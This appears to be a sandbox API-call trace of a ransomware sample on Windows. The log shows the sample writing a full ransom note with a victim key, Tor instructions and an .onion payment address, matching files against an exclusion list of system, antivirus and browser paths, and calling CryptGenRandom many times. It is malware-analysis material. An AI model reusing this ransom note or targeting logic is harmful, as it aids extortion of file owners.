[0160.972] FindClose (in: hFindFile=0x9ad138 | out: hFindFile=0x9ad138) returned 1 [0160.972] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sr-Latn-RS\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-rs\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.973] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.973] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.974] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.974] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.974] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.974] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.974] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.974] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*.exe") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*.dll") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*.lnk") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*.bat") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*.ini") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*.msi") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*.scf") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*pagefile.sys*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*AppData*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\winrar\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\java\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\windows\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\ESET\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\AVG\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*Atheros*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*Realtek*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*bootmgr*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*boot*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*boot*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*IO.SYS*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*ntldr*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*chrome*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*opera*") returned 0 [0160.974] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", pszSpec="*firefox*") returned 0 [0160.974] wcslen (_String="\\\\?\\") returned 0x4 [0160.974] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad5f8 [0160.975] wcscmp (_String1=".", _String2=".") returned 0 [0160.975] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.975] wcscmp (_String1="..", _String2=".") returned 1 [0160.975] wcscmp (_String1="..", _String2="..") returned 0 [0160.975] FindNextFileW (in: hFindFile=0x9ad5f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.975] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.975] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sv-SE\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.975] strlen (_Str="NMoreira") returned 0x8 [0160.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.975] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.976] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.977] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.978] 